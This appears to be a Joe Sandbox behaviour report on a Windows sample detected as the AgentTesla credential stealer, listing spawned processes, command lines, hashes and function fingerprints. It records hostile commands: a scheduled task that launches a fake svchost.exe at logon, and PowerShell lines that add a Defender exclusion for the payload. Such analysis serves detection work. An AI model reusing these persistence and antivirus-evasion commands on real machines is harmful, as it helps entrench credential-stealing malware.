Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Imagebase:	0x7ff7416a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""
Imagebase:	0x7ff7416a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Imagebase:	0x7ff6c1e10000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:14:20
Start date:	09/03/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0x7ff772e90000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:14:21
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x177458f0000
File size:	40'960 bytes
MD5 hash:	0603858E620614E6BADC889156F4F868
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 35%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	13:14:23
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x143dae10000
File size:	40'960 bytes
MD5 hash:	0603858E620614E6BADC889156F4F868
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	13:14:32
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x23775f40000
File size:	40'960 bytes
MD5 hash:	0603858E620614E6BADC889156F4F868
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	13:14:36
Start date:	09/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:14:36
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:14:36
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Imagebase:
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:14:37
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Imagebase:	0xd40000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:14:37
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Imagebase:	0x710000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:14:38
Start date:	09/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	13:14:38
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:14:41
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x1c6ae630000
File size:	40'960 bytes
MD5 hash:	0603858E620614E6BADC889156F4F868
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	13:14:41
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	13:14:59
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
Imagebase:	0xeb0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:14:59
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:15:01
Start date:	09/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 63200, Parent PID: 61576

General

Target ID:	27
Start time:	13:15:02
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:15:02
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
Imagebase:
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	13:15:03
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Imagebase:	0x9f0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	13:15:05
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:15:07
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	13:15:09
Start date:	09/03/2024
Path:	C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
Imagebase:	0xd80000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:15:09
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:15:28
Start date:	09/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:15:28
Start date:	09/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:15:28
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Imagebase:	0x4b0000
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	13:15:28
Start date:	09/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Imagebase:	0x7c0000
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:15:29
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:15:36
Start date:	09/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
Imagebase:	0x7ff79e7d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	14

Executed Functions

Function 0158D220 Relevance: 3.6, Strings: 1, Instructions: 2326COMMON

Download Yara Rule

Strings

,btq, xrefs: 0158D55F

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID: ,btq
API String ID: 0-3970051468
Opcode ID: ffab143b8d9adbb4e2bcbdebb614418359d5d59326ae87e9079aaa8abca7186a
Instruction ID: 4ffe085df4b1a3544dbe6baeb13dc6ef451664c52ab2a3c090effaec2d7d2919
Opcode Fuzzy Hash: ffab143b8d9adbb4e2bcbdebb614418359d5d59326ae87e9079aaa8abca7186a
Instruction Fuzzy Hash: F1331E31D1071A8EDB11EF68C8905ADF7B1FF99300F15C69AE449BB261EB70AAC5CB41

Uniqueness

Uniqueness Score: -1.00%

Function 06785AD8 Relevance: 3.0, Strings: 2, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06785E15
$]q, xrefs: 06785E21

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 1e43f2a3c360bf625cc14f56fb386712d096a05b5fc141b12d67e5ffe966dbe6
Instruction ID: 7ef0eb1d127ffeae8531833e14f03633fe33a665afab5a66eff685ccd8eac1b5
Opcode Fuzzy Hash: 1e43f2a3c360bf625cc14f56fb386712d096a05b5fc141b12d67e5ffe966dbe6
Instruction Fuzzy Hash: 4F02BF30B102059FDB95EF68D494A6EB7E2FF84304F248529D809EB394DB75EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01589ED8 Relevance: 2.9, Instructions: 2857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81e61d45002862420bf18a28619aa7d2b4d2cb8d578fbc3037990ce5ef47703
Instruction ID: 1344bf7a2edbdeb71db7908511411e8168e3ad0ae1d100fe3f9841b5afa49128
Opcode Fuzzy Hash: e81e61d45002862420bf18a28619aa7d2b4d2cb8d578fbc3037990ce5ef47703
Instruction Fuzzy Hash: BE63E831D10B1A8EDB11EB68C8945ADF7B1FF99300F15C79AE4587B121EB70AAD4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0678E118 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0678E206
Xaq, xrefs: 0678E21F

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 7fbc28af8de66c81a6ecf602bc99831cb825d265dae440e9023738e9a7d6566c
Instruction ID: cdae08b06d6e6941d67c7e3917ca43214e794a31e0cca6063a5100b1c397a338
Opcode Fuzzy Hash: 7fbc28af8de66c81a6ecf602bc99831cb825d265dae440e9023738e9a7d6566c
Instruction Fuzzy Hash: 5FB18274B002189FDB58EF79995467E7AA7BFC4720B05852DE40AE7388DE38CC06C792

Uniqueness

Uniqueness Score: -1.00%

Function 0158ABA1 Relevance: 2.1, Instructions: 2077COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08831442c22941db324f86df4f2a82cd0ff9e9885e66a41ef202a5b74a23f1d6
Instruction ID: 8689fba348654b03cd53d11616e2b67a6aeefbca97557b264622455417818ff5
Opcode Fuzzy Hash: 08831442c22941db324f86df4f2a82cd0ff9e9885e66a41ef202a5b74a23f1d6
Instruction Fuzzy Hash: 8B23E831D10B1A8ECB11EB68C8545ADF7B1FF99300F15C79AE458BB121EB70AAD5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01583E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vl, xrefs: 015840CB

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vl
API String ID: 0-682378881
Opcode ID: 0d93742ec73fa18a84c3ca53b0701ff09841ac0dd0c3321d5eb582676dec855b
Instruction ID: f47404d36f2995799a6b45b9810e5888c16a4b350220e771dae8ed62de56110d
Opcode Fuzzy Hash: 0d93742ec73fa18a84c3ca53b0701ff09841ac0dd0c3321d5eb582676dec855b
Instruction Fuzzy Hash: 36917170E0020ADFDF10EFA9C98179EBBF2BF88704F148529E815BB254DB749846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 067842C0 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef9999817ab652ffeb18ac85451d901729d1cce0381b46b86d3074463fa4107
Instruction ID: 17a8622bad140c1a9f1a4e3ffee99adc09554b432b428686550cbb223953431b
Opcode Fuzzy Hash: 6ef9999817ab652ffeb18ac85451d901729d1cce0381b46b86d3074463fa4107
Instruction Fuzzy Hash: E7629F34B402068FDB54EB68D594AADB7F2FF84314F248529D406EB398DBB5EC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06789147 Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838eab64f0598a225d99ec39299c70e111b3d2e23a904122b4c45dcbe8d9ebc3
Instruction ID: a6a2becc8652f67d9941d399c85c3e0f3af9412652dc6c98b93df9c34ba57b45
Opcode Fuzzy Hash: 838eab64f0598a225d99ec39299c70e111b3d2e23a904122b4c45dcbe8d9ebc3
Instruction Fuzzy Hash: E8226F70E502098FDFA4EB6CD4807BDB7B6EB85310F248926E509EB395DA39DC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01584A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ea17049343a45d4b2d3cebd78174727b972af7d2e7b39214463d2f4ad6c43d
Instruction ID: 2c6a75c9ba015d58472b8ece135c26e16c6d313f1928cd3b87f56f4e5087bdd5
Opcode Fuzzy Hash: 60ea17049343a45d4b2d3cebd78174727b972af7d2e7b39214463d2f4ad6c43d
Instruction Fuzzy Hash: 3FB12D70E0020A8FDF14DFA9D9857ADBBF2BF88354F148529D819FB254EB749885CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06752E03 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06752E86
GetCurrentThread.KERNEL32 ref: 06752EC3
GetCurrentProcess.KERNEL32 ref: 06752F00
GetCurrentThreadId.KERNEL32 ref: 06752F59

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8a757170c191753611556182a371b7f4a9019362f673836278d0fd5dceacb170
Instruction ID: 39fc27cf4da06e5f85362e9bdbf9db252d11d955722152a4af2dd7e7794a0118
Opcode Fuzzy Hash: 8a757170c191753611556182a371b7f4a9019362f673836278d0fd5dceacb170
Instruction Fuzzy Hash: 455157B0D003098FDB54DFA9D948BAEBBF1FF48300F248569D419A7261D7789944CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 06752E08 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06752E86
GetCurrentThread.KERNEL32 ref: 06752EC3
GetCurrentProcess.KERNEL32 ref: 06752F00
GetCurrentThreadId.KERNEL32 ref: 06752F59

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 55ae69a1bd158c11f10a9074389f7f4cd10f237b552c9dff38c77d6eb7365231
Instruction ID: d52234b4c7ee9ab225b2f6977a1a03490d897c12d49c5cce9183ce3d5470525f
Opcode Fuzzy Hash: 55ae69a1bd158c11f10a9074389f7f4cd10f237b552c9dff38c77d6eb7365231
Instruction Fuzzy Hash: 9C5157B09003098FDB54DFAAD548BAEBBF1FF88310F208569E419A7261D7786944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 01587301 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 015872C0

Strings

LR]q, xrefs: 0158732B

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID: DeleteFile
String ID: LR]q
API String ID: 4033686569-3081347316
Opcode ID: e31358a05e0a8e53895b07555817cf7c4bd5bf0b041def4bd1782ff35c74576e
Instruction ID: bcf87874e97e06b07b69ec6c299c3aad639b0b7f1b5ec08bdcb16ec141a8278d
Opcode Fuzzy Hash: e31358a05e0a8e53895b07555817cf7c4bd5bf0b041def4bd1782ff35c74576e
Instruction Fuzzy Hash: 6541B170E1021A8FDB15EFA9C84579DBBB1FF89314F208929E805FB251DB749941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0675B218 Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0675B47E

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d62a46599cfe128473581da69c8ca8e85c1f2acf9a9fe832cb3ca126be21690e
